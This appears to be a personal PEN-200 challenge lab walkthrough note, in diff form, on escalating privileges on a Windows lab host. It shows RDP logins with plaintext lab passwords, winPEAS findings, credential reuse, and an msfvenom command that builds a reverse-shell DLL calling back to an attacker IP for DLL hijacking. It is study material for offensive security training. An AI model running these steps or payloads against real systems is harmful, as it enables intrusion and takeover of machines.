pozu84/penetration-testing/PEN-200/25_Challenge Labs/C2_Relia/PEN-200 Relia.md

 # From the port scanning, we knew that RDP port is enable, lets try to find the password access to the Windows
 xfreerdp /u:emma /p:SomersetVinyl1! /v:192.168.197.248 +clipboard /cert-ignore
 PS C:\Users\emma\Desktop> cat local.txt
+# Upload winpeas and run [emma-winpeas.md]
+...
+    AppKey: !8@aBRBYdb3!
+    PS history file: C:\Users\emma\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
+    (Administrator) BetaTask: C:\BetaMonitor\BetaMonitor.exe
+    Trigger: At system startup-After triggered, repeat every 00:01:00 for a duration of 1.00:00:00.
+...
+# Here we get a Appkey, PS history file and taskscheduler with administrator running every 1 minute.
+# I would like to check the BetaMonitor emma permissions
+PS C:\BetaMonitor> icacls .
+.
+BUILTIN\Users:(OI)(CI)(RX)
+  NT AUTHORITY\SYSTEM:(OI)(CI)(F)
+  BUILTIN\Administrators:(OI)(CI)(F)
+  CREATOR OWNER:(OI)(CI)(IO)(F)
+# Emma user couldn't write, but there is a interesting file BetaMonitor.log is exist, and it shows
+...
+[2022-10-20_05:28:12.2019] Coudln't find BetaLibrary.Dll.
+...
+# We can create a BetaLibrary.Dll file and place it somewhere we can let it perform privilege escalations
+# Lets create a dll file
+msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.45.165  LPORT=8888 -f dll -o msf.dll
+# We cannot upload the dll payload to any SYSTEM ENV PATH..
+Stuck for a while.. and remember that we found a APPKEY from WinPEAS.
+Where I think we can try it for mark user
+xfreerdp /u:mark /p:'!8@aBRBYdb3!' /v:192.168.197.248 /cert-ignore +drive:/home/kali/Desktop,/smb
+# :) Fuck
+PS C:\Users\mark\Desktop> type proof.txt
+# Lets upload the dll payload again to the SYSTEM ENV PATH folder and wait for 1 minutes, named it to BetaLibrary.Dll
+# We have the mark user a.k.a Administrator, thats good for now.
+We may proceed to another machine now.